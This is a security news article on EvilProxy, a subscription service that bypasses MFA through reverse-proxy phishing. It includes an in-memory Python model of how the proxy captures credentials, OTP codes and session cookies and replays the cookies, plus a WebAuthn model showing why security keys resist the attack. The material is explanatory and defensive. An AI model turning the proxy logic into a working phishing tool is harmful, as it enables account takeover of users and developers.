EvilProxy - Phishing as a service - Alerte 2022

EvilProxy, a service that can bypass MFA

You may not know it, but enabling two-factor authentication on an account does not protect you from every attack, phishing included. The new service offered by cybercriminals, called EvilProxy, is proof of this. So what is EvilProxy, and what is it for?

Security researchers at Resecurity have discovered a new service called EvilProxy, advertised on various Dark Web forums. Used in phishing attacks, EvilProxy relies on the principles of reverse proxying and cookie injection to circumvent two-factor authentication.

The victim's session is effectively "proxied": without realising it, the user interacts with a malicious proxy server that sits between them and the target website, which lets EvilProxy collect the credentials and the 2FA code entered on the login page and, since every response also passes through the proxy, the session cookie the real site issues once the login succeeds. EvilProxy can generate phishing links that lead to spoofed pages (copies of the original site) with the aim of compromising credentials, and it supports many services, including Apple iCloud, Facebook, GoDaddy, GitHub, Google, Dropbox, Instagram, Microsoft, NPM, PyPI, RubyGems, Twitter and Yahoo.
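The flow described above, as an added in-memory model (not EvilProxy's code): the proxy reads the credentials and OTP out of the form the victim posts, relays the request to the real site with the Host header rewritten, then copies the session cookie from the site's reply and re-issues it scoped to the phishing domain. The host names, cookie name, form fields and the request/response pair are constructed for illustration.

```python
"""Added example (not EvilProxy's code): an in-memory model of the reverse-proxy
phishing flow. Host names, cookie names and form fields are constructed."""
from dataclasses import dataclass, field
from http.cookies import SimpleCookie
from urllib.parse import parse_qs

PHISHING_HOST = "login-example.evil.test"  # assumption: attacker's look-alike domain
TARGET_HOST = "login.example.com"          # assumption: the legitimate site


@dataclass
class Request:
    method: str
    path: str
    headers: dict
    body: str = ""


@dataclass
class Response:
    status: int
    headers: list           # (name, value) pairs; Set-Cookie may repeat
    body: str = ""


@dataclass
class Loot:
    credentials: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)


def forward_to_target(req: Request, loot: Loot) -> Request:
    """Proxy -> real site: relay the victim's request with the Host header
    rewritten, after copying any credentials or OTP out of the form body."""
    if req.method == "POST" and "x-www-form-urlencoded" in req.headers.get("Content-Type", ""):
        form = parse_qs(req.body)
        for key in ("username", "password", "otp"):
            if key in form:
                loot.credentials[key] = form[key][0]
    headers = dict(req.headers, Host=TARGET_HOST)
    return Request(req.method, req.path, headers, req.body)


def relay_to_victim(resp: Response, loot: Loot) -> Response:
    """Real site -> proxy -> victim: keep a copy of every cookie the real site
    sets (the authenticated session), then re-issue it scoped to the phishing
    domain so the victim's browser keeps talking to the proxy."""
    headers = []
    for name, value in resp.headers:
        if name.lower() != "set-cookie":
            headers.append((name, value))
            continue
        jar = SimpleCookie()
        jar.load(value)
        for morsel in jar.values():
            loot.cookies[morsel.key] = morsel.value
            morsel["domain"] = PHISHING_HOST
            headers.append(("Set-Cookie", morsel.OutputString()))
    # Links and redirects in the body are rewritten so the victim stays on the proxy.
    return Response(resp.status, headers, resp.body.replace(TARGET_HOST, PHISHING_HOST))


def attacker_cookie_header(loot: Loot) -> str:
    """What the attacker sends to the real site afterwards: the captured session
    cookie alone; no password or OTP is needed any more."""
    return "; ".join(f"{k}={v}" for k, v in loot.cookies.items())


def run_demo() -> tuple:
    """One constructed login exchange through the proxy; returns (loot, relayed request, relayed response)."""
    loot = Loot()
    # Constructed victim request: credentials and 2FA code posted to the proxy.
    victim_post = Request(
        "POST", "/login",
        {"Host": PHISHING_HOST, "Content-Type": "application/x-www-form-urlencoded"},
        "username=alice&password=Winter2022%21&otp=493021",
    )
    upstream = forward_to_target(victim_post, loot)
    # Constructed reply from the real site: login accepted, session cookie issued.
    site_reply = Response(
        302,
        [("Location", f"https://{TARGET_HOST}/home"),
         ("Set-Cookie", f"session=9f1c2e7a; Path=/; Domain={TARGET_HOST}; Secure; HttpOnly")],
        f"Redirecting to https://{TARGET_HOST}/home",
    )
    relayed = relay_to_victim(site_reply, loot)
    return loot, upstream, relayed


if __name__ == "__main__":
    loot, upstream, relayed = run_demo()
    print("captured:", loot.credentials, loot.cookies)
    print("attacker replays:", attacker_cookie_header(loot))
```

Note what the OTP buys the attacker here: nothing beyond a few seconds of delay, because the proxy relays it to the real site while it is still valid, and what it keeps afterwards is the session cookie, which is what it needs to act as the user.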

EvilProxy, a PhaaS service available by subscription

EvilProxy is a phishing-as-a-service (PhaaS) offering sold as a subscription for 10, 20 or 31 days. For example, access to the kit costs 400 dollars for one month; the buyer then gets access over the Tor network once payment has been made. That essential step is carried out over Telegram, after talking to one of the people behind the EvilProxy project: in other words, access to the tool is subject to vetting by the cybercriminals. Depending on the options chosen, the subscription price rises; targeting Google accounts, for instance, can cost up to 600 dollars per month.

Beyond consumer services like Facebook, Google or Microsoft, EvilProxy also makes it possible to target NPM, PyPI and GitHub accounts, which is a powerful capability. If an attacker gains unauthorised access to a PyPI account, they can inject malicious code into a popular package and infect everyone who installs it. So it is not only ordinary users who are targeted, but also developers, DevOps engineers and the like.

Two-factor authentication, yes, but a security key is even better against attacks of this type: a FIDO2/WebAuthn credential is bound to the legitimate site's origin, so an assertion produced on the attacker's look-alike domain is rejected by the real site, and there is no one-time code for the proxy to relay.
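Why the origin binding defeats the proxy, as an added model (not from the article or from any WebAuthn library): the browser, not the page, writes the real origin into clientDataJSON, the security key signs over it, and the relying party checks both the origin and the RP ID hash before the signature. HMAC-SHA256 with a per-credential secret stands in for the key's asymmetric signature, and the domain names are assumptions; everything else follows the WebAuthn assertion verification steps.

```python
"""Added example: model of a FIDO2/WebAuthn assertion under a reverse-proxy phish.
HMAC stands in for the authenticator's asymmetric signature; domains are assumed."""
import base64
import hashlib
import hmac
import json
import secrets

RP_ID = "example.com"                                # assumption: relying party ID
EXPECTED_ORIGIN = "https://login.example.com"        # assumption: legitimate origin
PHISHING_ORIGIN = "https://login-example.evil.test"  # assumption: attacker's proxy


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def rp_id_allowed_for_origin(rp_id: str, origin: str) -> bool:
    """Browser-side rule: the RP ID must equal, or be a registrable suffix of,
    the origin's host. A page on evil.test cannot ask for example.com."""
    host = origin.split("://", 1)[1].split("/", 1)[0].split(":")[0]
    return host == rp_id or host.endswith("." + rp_id)


def authenticator_sign(cred_secret: bytes, rp_id: str, client_data: bytes):
    """Model of the security key: authenticatorData = rpIdHash | flags(UP) | signCount;
    the signature covers authenticatorData || SHA-256(clientDataJSON)."""
    auth_data = hashlib.sha256(rp_id.encode()).digest() + b"\x01" + (0).to_bytes(4, "big")
    msg = auth_data + hashlib.sha256(client_data).digest()
    return auth_data, hmac.new(cred_secret, msg, hashlib.sha256).digest()


def browser_get_assertion(cred_secret: bytes, rp_id: str, origin: str, challenge: bytes):
    """Model of the browser: it fills in the origin field itself and refuses
    an RP ID that does not match the page it is showing."""
    if not rp_id_allowed_for_origin(rp_id, origin):
        raise PermissionError(f"rpId {rp_id!r} is not valid for origin {origin!r}")
    client_data = json.dumps(
        {"type": "webauthn.get", "challenge": b64url(challenge), "origin": origin},
        separators=(",", ":"),
    ).encode()
    auth_data, sig = authenticator_sign(cred_secret, rp_id, client_data)
    return client_data, auth_data, sig


def verify_assertion(cred_secret: bytes, challenge: bytes, client_data: bytes,
                     auth_data: bytes, sig: bytes) -> str:
    """Relying-party checks, in spec order. Returns 'ok' or the name of the failing check."""
    cd = json.loads(client_data)
    if cd.get("type") != "webauthn.get":
        return "bad type"
    if not hmac.compare_digest(cd.get("challenge", ""), b64url(challenge)):
        return "challenge mismatch"
    if cd.get("origin") != EXPECTED_ORIGIN:
        return "origin mismatch"
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return "rpIdHash mismatch"
    if not auth_data[32] & 0x01:
        return "user presence flag missing"
    expected = hmac.new(cred_secret, auth_data + hashlib.sha256(client_data).digest(),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):
        return "bad signature"
    return "ok"


def run_scenarios() -> dict:
    cred_secret = secrets.token_bytes(32)   # established at registration
    challenge = secrets.token_bytes(32)     # fresh per login, issued by the real site
    results = {}
    # 1. Genuine login on the real origin.
    results["legitimate"] = verify_assertion(
        cred_secret, challenge, *browser_get_assertion(cred_secret, RP_ID, EXPECTED_ORIGIN, challenge))
    # 2. The proxy relays the real site's options (rpId=example.com) to a page on evil.test.
    try:
        browser_get_assertion(cred_secret, RP_ID, PHISHING_ORIGIN, challenge)
        results["proxy_same_rpid"] = "assertion produced"
    except PermissionError:
        results["proxy_same_rpid"] = "browser refused"
    # 3. Even an assertion made for the phishing origin (modelled with its own rpId;
    #    a real key would hold no credential for it) fails the RP's origin check.
    client_data, auth_data, sig = browser_get_assertion(cred_secret, "evil.test", PHISHING_ORIGIN, challenge)
    results["proxy_relayed"] = verify_assertion(cred_secret, challenge, client_data, auth_data, sig)
    # 4. The attacker patches origin and rpIdHash (both public) but cannot re-sign.
    tampered = client_data.replace(PHISHING_ORIGIN.encode(), EXPECTED_ORIGIN.encode())
    forged_auth = hashlib.sha256(RP_ID.encode()).digest() + auth_data[32:]
    results["proxy_tampered"] = verify_assertion(cred_secret, challenge, tampered, forged_auth, sig)
    return results


if __name__ == "__main__":
    for name, outcome in run_scenarios().items():
        print(f"{name:18s} {outcome}")
```

Contrast this with a TOTP code, which is the same six digits whoever relays it: the proxy forwards it unchanged and the real site accepts it. A WebAuthn assertion carries the origin it was made on inside the signed data, so there is nothing the proxy can forward that the real site will accept.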



#EvilProxy #service #bypass #MFA
